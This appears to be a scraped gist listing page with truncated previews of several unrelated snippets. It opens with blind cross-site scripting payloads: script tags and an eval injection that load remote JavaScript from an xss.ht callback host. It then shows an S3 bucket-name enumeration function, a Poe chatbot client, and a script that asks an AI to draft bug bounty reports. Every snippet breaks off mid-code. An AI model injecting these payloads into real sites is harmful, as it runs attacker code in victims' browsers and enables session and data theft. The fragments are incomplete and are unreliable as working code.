This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
"><script src=https://username.xss.ht></script> | |
'><script src=https://username.xss.ht></script> | |
";eval('var a=document.createElement(\'script\');a.src=\'https://username.xss.ht\';document.body.appendChild(a)') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# You can do something like this, but please don't. Don't reinvent the wheel unless your wheel is rounder. | |
# Instead, you can inspire from existing tools or even extend them! | |
s3() { | |
echo "https://$1.s3.amazonaws.com/" | |
cat ~/wordlists/s3bucket-permutation | while read pref; do | |
echo https://$pref-$1.s3.amazonaws.com/ | |
echo https://$pref-$1-s3.s3.amazonaws.com/ | |
echo https://$pref-$1-bucket.s3.amazonaws.com/ | |
echo https://$1-$pref.s3.amazonaws.com/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import poe | |
client = poe.Client(input("Enter The Token: ")) | |
F="" | |
message=input("\n\tYou: ") | |
while message != "END": | |
F=F+message | |
message=input("\n\t") | |
while F!="THEEND": | |
print("\n\tBot: \n") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import poe, sys | |
client = poe.Client("<POE_API_KEY_HERE>") | |
title=sys.argv[1] | |
path=sys.argv[2] | |
more="" | |
if len(sys.argv) > 3: | |
more="\" and here is more information: "+sys.argv[3] | |
message="""generate a bug bounty report for me (hackerone.com), the title of the bug is """+title+""" and the vulnerability path is \""""+path+more+""" |